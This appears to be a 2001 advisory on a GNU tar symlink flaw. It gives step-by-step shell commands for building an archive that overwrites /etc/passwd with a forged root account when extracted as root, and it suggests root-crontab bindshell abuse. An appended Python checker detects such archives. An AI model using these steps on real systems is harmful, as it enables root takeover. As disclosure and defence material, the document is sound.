tar-symlink.txt
Posted Jan 8, 2001
Authored by Marco van Berkum | Site obit.nl

GNU tar follows symlinks blindly, a problem if you untar as root.

tags | exploit, root
SHA-256 | 941d4baa8400f1fbed234f9bd2533ce2860e8137e6ad91ba30b49a049594c4f6

Title        : GNU tar (Tape ARchive) symlink vulnerability
Author : Marco van Berkum
Organisation : OBIT b.v.
URL : http://www.obit.nl
Email : m.v.berkum@obit.nl
Date : 06-01-2001

The useful program tar (Tape ARchive) is used by all UNIX, Linux and BSD
versions around and is used to ARCHIVE files to disk or tape in an easy
portable format.

While this program has been used for a long time there seemed to be no
need to fix the problem of following symlinks in an archive.
The problem is that tar follows symlinks without questioning whether
this is a file which is harmless or a file such as /etc/passwd.
This way it will be possible to overwrite ANY file on the system when
untarred as root (NOT DONE).

How can this be done?

Well, you create a test directory to see the effect of a tarred symlink

% mkdir test
% cd test
% ln -s /etc/passwd passwd
% ls -al
total 2
drwx--x--x 2 user user 1024 Aug 7 13:08 ./
drwxr-xr-x 27 user user 1024 Aug 7 13:08 ../
lrwxrwxrwx 1 user user 11 Aug 7 13:08 passwd -> /etc/passwd
%

You now have a symlink to /etc/passwd; next we are going to tar this
symlink.

% tar -cvf test.tar *
% ls -al
total 12
drwx--x--x 2 user user 1024 Aug 7 13:11 ./
drwxr-xr-x 27 user user 1024 Aug 7 13:08 ../
lrwxrwxrwx 1 user user 11 Aug 7 13:08 passwd -> /etc/passwd
-rw------- 1 user user 10240 Aug 7 13:11 test.tar
%

Let's see what's in the tarfile now

% tar -tf test.tar
passwd <- AHA a symlink ;)
%

This is not visible as a symlink when you do -tf !!
It would be when doing tar -tvf (verbose).

So next we remove the symlink from the test directory

% rm passwd

We now have only the tarfile with the symlink to /etc/passwd; next we
create our own passwd file

% echo "root:our_password_string:0:0::/root:/bin/bash" >passwd
% echo "hax0r:our_password_string:1000:100::/tmp:/bin/bash" >>passwd

OK, now we have a test.tar and a passwd file; all we would have to do is
simply append the passwd file to the tarfile.

% tar -rf test.tar passwd

Now list it

% tar -tf test.tar
passwd <- AHA a symlink ;)
passwd <- our evil passwdfile
%

Now one can imagine what happens when this tarfile is extracted as root:
it will create a symlink to /etc/passwd and overwrite it with ours.
Of course this is possible with all files on the system; one of the most
malicious things to do would be overwriting the root crontab and
executing commands that way.
Even programs like bindshell can be executed this way by making a
symlink to, say, /tmp, dumping the bindshell binary/source to /tmp and
making a root crontab pointing to that file by executing or compiling
and executing it, which will leave us with a rootshell ;)

Solution:

Well, obviously one should NEVER untar files as root, but a patch to
the tar program which enhances tar by asking whether it should follow
symlinks or not would do the trick as well.

grtz,
Marco van Berkum
--
Sex is like hacking. You get in, you get out,
and you hope you didn't leave something behind
that can be traced back to you.

Marco van Berkum, System Operator/Security Analyst OBIT b.v.
RIPEHANDLE: MB17300-RIPE
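
A pre-extraction check for the archive layout described above, as an added example that is not part of the original advisory: it reads only the tar headers and reports any member whose path is, or passes through, a symlink stored earlier in the same archive. The function names and the in-memory sample archives are constructed for illustration.

```python
import io
import posixpath
import tarfile


def find_symlink_overwrites(tar_bytes):
    """Return (member, link, target) for each member whose path is, or passes
    through, a symlink stored earlier in the same archive.
    Only headers are read; nothing is extracted."""
    links = {}      # normalized symlink member path -> link target
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:") as tar:
        for member in tar:
            parts = posixpath.normpath(member.name).split("/")
            # Test the full path and every parent directory prefix.
            for i in range(1, len(parts) + 1):
                prefix = "/".join(parts[:i])
                if prefix in links:
                    findings.append((member.name, prefix, links[prefix]))
                    break
            if member.issym():
                links["/".join(parts)] = member.linkname
    return findings


def build_archive(entries):
    """Build an in-memory tar from (name, link_target_or_None) pairs.
    Hypothetical helper used only to construct sample input."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, target in entries:
            info = tarfile.TarInfo(name)
            if target is None:
                data = b"constructed placeholder content\n"
                info.size = len(data)
                tar.addfile(info, io.BytesIO(data))
            else:
                info.type = tarfile.SYMTYPE
                info.linkname = target
                tar.addfile(info)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample with the same member order as the advisory's test.tar.
    sample = build_archive([("passwd", "/etc/passwd"), ("passwd", None)])
    for name, link, target in find_symlink_overwrites(sample):
        print(f"refuse: {name!r} lands on symlink {link!r} -> {target!r}")
```

An empty result means no member reuses a symlink from the same archive; it says nothing about symlinks that already exist in the extraction directory.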

